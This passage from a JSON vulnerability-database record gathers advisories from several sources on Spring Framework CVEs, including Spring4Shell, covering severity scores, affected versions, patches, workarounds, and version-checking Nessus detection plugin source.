"cpe:/a:oracle:communications_cloud_native_core_console:1.9.0", "cpe:/a:oracle:communications_cloud_native_core_service_communication_proxy:1.15.0", "cpe:/a:vmware:spring_framework:5.3.13"], "id": "CVE-2021-22060", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22060", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_framework:5.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_service_communication_proxy:1.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_framework:5.2.18:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2023-06-16T02:39:47", "description": "A flaw was found in the Spring Framework. This flaw allows an attacker to craft a special Spring Expression, causing a denial of service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T21:07:31", "type": "redhatcve", "title": "CVE-2022-22950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-06-16T01:43:41", "id": "RH:CVE-2022-22950", "href": "https://access.redhat.com/security/cve/cve-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-05-27T14:32:29", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-02-17T04:30:23", "type": "redhatcve", "title": "CVE-2021-22060", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2023-04-06T08:47:59", "id": "RH:CVE-2021-22060", "href": "https://access.redhat.com/security/cve/cve-2021-22060", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-09-01T00:09:19", "description": "A flaw was found in Spring Framework, specifically within two modules called Spring MVC and Spring WebFlux, (transitively affected from Spring Beans), using parameter data binding. This flaw allows an attacker to pass specially-constructed malicious requests to certain parameters and possibly gain access to normally-restricted functionality within the Java Virtual Machine.\n#### Mitigation\n\nFor those who are not able to upgrade affected Spring classes to the fixed versions, there is a workaround customers can implement for their applications, via setting disallowed fields on the data binder, and denying various iterations of the string &quot;class.*&quot; \n\n\nFor full implementation details, see Spring&#x27;s early announcement post in the &quot;suggested workarounds&quot; section: <https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:57", "type": "redhatcve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-08-31T16:16:01", "id": "RH:CVE-2022-22965", "href": "https://access.redhat.com/security/cve/cve-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T20:35:36", "description": "A flaw was found in Spring Cloud Function via the spring.cloud.function.routing-expression header that is modified by the attacker to contain malicious expression language code. The attacker is able to call functions that should not normally be accessible, including runtime exec calls.\n#### Mitigation\n\nAffected customers should update immediately as soon as patched software is available. There are no other mitigations available at this time. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:32:29", "type": "redhatcve", "title": "CVE-2022-22963", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2023-04-06T09:43:13", "id": "RH:CVE-2022-22963", "href": "https://access.redhat.com/security/cve/cve-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-07-27T20:39:31", "description": "n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions,\nit is possible for a user to provide a specially crafted SpEL expression\nthat may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-04-01T00:00:00", "id": "UB:CVE-2022-22950", "href": "https://ubuntu.com/security/CVE-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-07-27T22:00:19", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older\nunsupported versions, it is possible for a user to provide malicious input\nto cause the insertion of additional log entries. This is a follow-up to\nCVE-2021-22096 that protects against additional types of input and in more\nplaces of the Spring Framework codebase.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-10T00:00:00", "type": "ubuntucve", "title": "CVE-2021-22060", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2022-01-10T00:00:00", "id": "UB:CVE-2021-22060", "href": "https://ubuntu.com/security/CVE-2021-22060", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-07-27T20:40:04", "description": "A Spring MVC or Spring WebFlux application running on JDK 9+ may be\nvulnerable to remote code execution (RCE) via data binding. The specific\nexploit requires the application to run on Tomcat as a WAR deployment. If\nthe application is deployed as a Spring Boot executable jar, i.e. the\ndefault, it is not vulnerable to the exploit. However, the nature of the\nvulnerability is more general, and there may be other ways to exploit it.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-22965", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "UB:CVE-2022-22965", "href": "https://ubuntu.com/security/CVE-2022-22965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-11T01:18:22", "description": "In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-03T00:01:00", "type": "osv", "title": "Allocation of Resources Without Limits or Throttling in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-04-11T01:18:17", "id": "OSV:GHSA-558X-2XJG-6232", "href": "https://osv.dev/vulnerability/GHSA-558x-2xjg-6232", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-03-28T05:43:52", "description": "Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`. \n\n## Impact\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\nThese are the prerequisites for the exploit:\n- JDK 9 or higher\n- Apache Tomcat as the Servlet container\n- Packaged as WAR\n- `spring-webmvc` or `spring-webflux` dependency\n\n## Patches\n\n- Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE)\n- Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)\n\n## Workarounds\n\nFor those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:30:50", "type": "osv", "title": "Remote Code Execution in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-03-28T05:43:49", "id": "OSV:GHSA-36P3-WJMG-H94X", "href": "https://osv.dev/vulnerability/GHSA-36p3-wjmg-h94x", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:38:49", "description": "In Spring Framework versions 5.3.0 - 5.3.13, 5.2.0 - 5.2.18, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. This is a follow-up to CVE-2021-22096 that protects against additional types of input and in more places of the Spring Framework codebase.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-01-12T23:04:06", "type": "osv", "title": "Log entry injection in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22060", "CVE-2021-22096"], "modified": "2023-04-11T01:38:45", "id": "OSV:GHSA-6GF2-PVQW-37PH", "href": "https://osv.dev/vulnerability/GHSA-6gf2-pvqw-37ph", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "broadcom": [{"lastseen": "2023-09-12T16:36:52", "description": "In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {}, "published": "2023-08-29T00:00:00", "type": "broadcom", "title": "Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22950"], "modified": "2023-08-29T18:39:42", "id": "BSNSA22503", "href": "https://support.broadcom.com/external/content/SecurityAdvisories/0/22503", "cvss": {"score": "6.5", "vector": "Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}}], "nessus": [{"lastseen": "2023-05-17T18:30:35", "description": "The remote host contains a Spring Framework version that is prior to 5.2.20 or 5.3.x prior to 5.3.17. It is, therefore, affected by denial of service vulnerability. A remote, authenticated attacker could provide a specially crafted SpEL as a routing expression that may result in denial of service condition.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-08T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.17 DoS (CVE-2022-22950)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22950"], "modified": "2022-10-04T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework"], "id": "SPRING_CVE-2022-22950.NASL", "href": "https://www.tenable.com/plugins/nessus/161949", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161949);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/04\");\n\n script_cve_id(\"CVE-2022-22950\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 5.3.17 DoS (CVE-2022-22950)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a web application framework that is affected by denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a Spring Framework version that is prior to 5.2.20 or 5.3.x prior to 5.3.17. It is, therefore, \naffected by denial of service vulnerability. A remote, authenticated attacker could provide a specially crafted SpEL as a\nrouting expression that may result in denial of service condition.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tanzu.vmware.com/security/CVE-2022-22950\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Spring Framework version 5.2.20 or 5.3.17 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22950\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pivotal_software:spring_framework\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"spring_jar_detection.nbin\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Spring Framework');\n\nvar constraints = [\n { 'min_version':'5.2', 'fixed_version':'5.2.20' },\n { 'min_version':'5.3', 'fixed_version':'5.3.17' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:37:53", "description": "The version of Dell EMC NetWorker installed on the remote Windows host is prior to 19.8. It, therefore, contains a version of Spring Framework that is affected by a denial of service (DoS) vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-12-13T00:00:00", "type": "nessus", "title": "Dell EMC NetWorker < 19.8 DoS (DSA-2022-350)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22950"], "modified": "2022-12-14T00:00:00", "cpe": ["cpe:/a:dell:emc_networker"], "id": "EMC_NETWORKER_DSA-2022-350.NASL", "href": "https://www.tenable.com/plugins/nessus/168650", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168650);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/14\");\n\n script_cve_id(\"CVE-2022-22950\");\n\n script_name(english:\"Dell EMC NetWorker < 19.8 DoS (DSA-2022-350)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Dell EMC NetWorker installed on the remote Windows host is prior to 19.8. It, therefore, contains a\nversion of Spring Framework that is affected by a denial of service (DoS) vulnerability.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.dell.com/support/kbdoc/en-ie/000206132/dsa-2022-350-dell-networker-security-update-for-spring-framework-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2f8a39c1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade Dell EMC Networker to 19.8 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22950\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dell:emc_networker\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"emc_networker_installed.nasl\");\n script_require_keys(\"installed_sw/EMC NetWorker\", \"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::get_app_info(app:'EMC NetWorker', win_local:TRUE);\n\nvar constraints = [\n { 'fixed_version' : '19.7', 'fixed_display': '19.8' }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_WARNING\n);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-27T15:18:38", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency", "cvss3": {}, "published": "2022-04-06T00:00:00", "type": "nessus", "title": "Spring Framework Spring4Shell (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/159542", "sourceData": "Binary data spring4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-04T14:42:56", "description": "The remote host contains a Spring Framework library version that is prior to 5.2.20 or 5.3.x prior to 5.3.18. It is, therefore, affected by a remote code execution vulnerability:\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n - These are the prerequisites for the exploit:\n - JDK 9 or higher\n - Apache Tomcat as the Servlet container\n - Packaged as WAR\n - spring-webmvc or spring-webflux dependency\n\nNote that users are required to enable the 'Show potential false alarms' setting, also known as paranoid mode, in their scan policy in order to enable this plugin in a scan. In addition, the 'Perform thorough tests' setting must be enabled as well.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-03-31T00:00:00", "type": "nessus", "title": "Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:pivotal_software:spring_framework", "cpe:/a:vmware:spring_framework"], "id": "SPRING_CVE-2022-22965_LOCAL.NASL", "href": "https://www.tenable.com/plugins/nessus/159374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159374);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Spring Framework < 5.2.20 / 5.3.x < 